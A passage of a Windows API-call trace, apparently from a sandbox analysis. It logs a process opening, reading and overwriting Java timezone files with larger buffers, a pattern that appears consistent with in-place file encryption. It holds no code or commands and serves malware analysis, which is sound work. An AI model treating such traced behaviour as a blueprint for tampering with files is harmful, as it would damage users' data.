cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Tortola", lpUsedDefaultChar=0x0) returned 7 [0138.086] ReadFile (in: hFile=0x208, lpBuffer=0x1fc1f08, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fc1f08*, lpNumberOfBytesRead=0x2fdf2bc*=0x41, lpOverlapped=0x0) returned 1 [0138.088] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0138.088] WriteFile (in: hFile=0x208, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5c9, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x5c9, lpOverlapped=0x0) returned 1 [0138.088] CloseHandle (hObject=0x208) returned 1 [0138.088] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\DumontDUrville" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\dumontdurville"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0138.089] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0138.089] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x51 [0138.090] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0138.090] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0138.090] ReleaseMutex (hMutex=0x168) returned 1 [0138.090] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DumontDUrville", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0138.090] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DumontDUrville", cchWideChar=14, lpMultiByteStr=0x1f7346c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DumontDUrville", lpUsedDefaultChar=0x0) returned 14 [0138.090] ReadFile (in: hFile=0x208, lpBuffer=0x1f9fd68, nNumberOfBytesToRead=0x51, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f9fd68*, lpNumberOfBytesRead=0x2fdf2bc*=0x51, lpOverlapped=0x0) returned 1 [0138.091] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0138.091] WriteFile (in: hFile=0x208, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x5d9, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x2fdf2d0*=0x5d9, lpOverlapped=0x0) returned 1 [0138.092] CloseHandle (hObject=0x208) returned 1 [0138.092] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Aden" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\aden"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0138.093] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0138.093] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x41 [0138.093] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0138.093] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0138.093] ReleaseMutex (hMutex=0x168) returned 1 [0138.094] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Aden", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0138.094] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Aden", cchWideChar=4, lpMultiByteStr=0x1f7acfc, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Aden", lpUsedDefaultChar=0x0) returned 4 [0138.094] ReadFile (in: hFile=0x208, lpBuffer=0x1fc1f08, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fc1f08*, lpNumberOfBytesRead=0x2fdf2bc*=0x41, lpOverlapped=0x0) returned 1 [0138.095] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0138.096] WriteFile (in: hFile=0x208, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5c9, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x5c9, lpOverlapped=0x0) returned 1 [0138.096] CloseHandle (hObject=0x208) returned 1 [0138.096] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Bahrain" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\bahrain"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0138.097] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0138.098] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x4d [0138.098] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0138.098] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0138.098] ReleaseMutex (hMutex=0x168) returned 1 [0138.098] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Bahrain", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0138.098] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Bahrain", cchWideChar=7, lpMultiByteStr=0x1f7acfc, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Bahrain", lpUsedDefaultChar=0x0) returned 7 [0138.098] ReadFile (in: hFile=0x208, lpBuffer=0x1f9fd68, nNumberOfBytesToRead=0x4d, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f9fd68*, lpNumberOfBytesRead=0x2fdf2bc*=0x4d, lpOverlapped=0x0) returned 1 [0138.100] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0138.100] WriteFile (in: hFile=0x208, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x5d5, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x2fdf2d0*=0x5d5, lpOverlapped=0x0) returned 1 [0138.101] CloseHandle (hObject=0x208) returned 1 [0138.101] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Colombo" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\colombo"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0138.102] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0138.102] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x81 [0138.103] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0138.103] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0138.103] ReleaseMutex (hMutex=0x168) returned 1 [0138.103] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Colombo", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0138.103] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Colombo", cchWideChar=7, lpMultiByteStr=0x1f7acfc, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Colombo", lpUsedDefaultChar=0x0) returned 7 [0138.103] ReadFile (in: hFile=0x208, lpBuffer=0x1f2e8f8, nNumberOfBytesToRead=0x81, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f2e8f8*, lpNumberOfBytesRead=0x2fdf2bc*=0x81, lpOverlapped=0x0) returned 1 [0138.105] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0138.105] WriteFile (in: hFile=0x208, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x609, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x2fdf2d0*=0x609, lpOverlapped=0x0) returned 1 [0138.105] CloseHandle (hObject=0x208) returned 1 [0138.106] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Hebron" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\hebron"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0138.106] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0138.107] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x4e4 [0138.107] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0138.107] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0138.107] ReleaseMutex (hMutex=0x168) returned 1 [0138.107] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Hebron", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0138.107] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Hebron", cchWideChar=6, lpMultiByteStr=0x1f7acfc, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Hebron", lpUsedDefaultChar=0x0) returned 6 [0138.108] ReadFile (in: hFile=0x208, lpBuffer=0x25a7b98, nNumberOfBytesToRead=0x4e4, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x25a7b98*, lpNumberOfBytesRead=0x2fdf2bc*=0x4e4, lpOverlapped=0x0) returned 1 [0138.171] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0138.171] WriteFile (in: hFile=0x208, lpBuffer=0x1ea3958*, nNumberOfBytesToWrite=0xa6c, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesWritten=0x2fdf2d0*=0xa6c, lpOverlapped=0x0) returned 1 [0138.172] CloseHandle (hObject=0x208) returned 1 [0138.172] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Kabul" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\kabul"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0138.173] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0138.173] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x41 [0138.173] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0138.173] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0138.174] ReleaseMutex (hMutex=0x168) returned 1 [0138.174] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Kabul", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0138.174] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Kabul", cchWideChar=5, lpMultiByteStr=0x1f7acfc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Kabul", lpUsedDefaultChar=0x0) returned 5 [0138.174] ReadFile (in: hFile=0x208, lpBuffer=0x1fc1f08, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fc1f08*, lpNumberOfBytesRead=0x2fdf2bc*=0x41, lpOverlapped=0x0) returned 1 [0138.175] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0138.175] WriteFile (in: hFile=0x208, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5c9, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x5c9, lpOverlapped=0x0) returned 1 [0138.176] CloseHandle (hObject=0x208) returned 1 [0138.176] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Kuala_Lumpur" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\kuala_lumpur"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0138.177] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0138.177] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x91 [0138.177] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0138.177] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0138.178] ReleaseMutex (hMutex=0x168) returned 1 [0138.178] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Kuala_Lumpur", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0138.178] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Kuala_Lumpur", cchWideChar=12, lpMultiByteStr=0x1f735ac, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Kuala_Lumpur", lpUsedDefaultChar=0x0) returned 12 [0138.178] ReadFile (in: hFile=0x208, lpBuffer=0x1f6fbf8, nNumberOfBytesToRead=0x91, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f6fbf8*, lpNumberOfBytesRead=0x2fdf2bc*=0x91, lpOverlapped=0x0) returned 1 [0138.179] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0138.179] WriteFile (in: hFile=0x208, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x619, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x2fdf2d0*=0x619, lpOverlapped=0x0) returned 1 [0138.180] CloseHandle (hObject=0x208) returned 1 [0138.180] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Nicosia" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\nicosia"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0138.181] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0138.181] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x45c [0138.181] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0138.181] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0138.182] ReleaseMutex (hMutex=0x168) returned 1 [0138.182] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Nicosia", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0138.182] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Nicosia", cchWideChar=7, lpMultiByteStr=0x1f7acfc, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Nicosia", lpUsedDefaultChar=0x0) returned 7 [0138.182] ReadFile (in: hFile=0x208, lpBuffer=0x269cae8, nNumberOfBytesToRead=0x45c, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x269cae8*, lpNumberOfBytesRead=0x2fdf2bc*=0x45c, lpOverlapped=0x0) returned 1 [0139.272] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0139.272] WriteFile (in: hFile=0x208, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0x9e4, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x9e4, lpOverlapped=0x0) returned 1 [0139.273] CloseHandle (hObject=0x208) returned 1 [0139.273] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Qatar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\qatar"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0139.275] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0139.275] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x4d [0139.275] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0139.276] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0139.276] ReleaseMutex (hMutex=0x168) returned 1 [0139.276] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Qatar", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0139.276] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Qatar", cchWideChar=5, lpMultiByteStr=0x1f7ad2c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Qatar", lpUsedDefaultChar=0x0) returned 5 [0139.276] ReadFile (in: hFile=0x208, lpBuffer=0x1f9fe28, nNumberOfBytesToRead=0x4d, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f9fe28*, lpNumberOfBytesRead=0x2fdf2bc*=0x4d, lpOverlapped=0x0) returned 1 [0139.277] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0139.277] WriteFile (in: hFile=0x208, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x5d5, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x2fdf2d0*=0x5d5, lpOverlapped=0x0) returned 1 [0139.281] CloseHandle (hObject=0x208) returned 1 [0139.282] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Samarkand" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\samarkand"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0139.283] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0139.283] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x105 [0139.283] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0139.284] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0139.284] ReleaseMutex (hMutex=0x168) returned 1 [0139.284] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Samarkand", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0139.284] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Samarkand", cchWideChar=9, lpMultiByteStr=0x1f7340c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Samarkand", lpUsedDefaultChar=0x0) returned 9 [0139.284] ReadFile (in: hFile=0x208, lpBuffer=0x1ef2a38, nNumberOfBytesToRead=0x105, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ef2a38*, lpNumberOfBytesRead=0x2fdf2bc*=0x105, lpOverlapped=0x0) returned 1 [0139.285] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0139.285] WriteFile (in: hFile=0x208, lpBuffer=0x25aa3d8*, nNumberOfBytesToWrite=0x68d, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x25aa3d8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x68d, lpOverlapped=0x0) returned 1 [0139.285] CloseHandle (hObject=0x208) returned 1 [0139.286] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Thimphu" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\thimphu"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0139.287] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0139.287] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x4d [0139.287] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0139.287] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0139.287] ReleaseMutex (hMutex=0x168) returned 1 [0139.287] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Thimphu", cchWideChar=7, 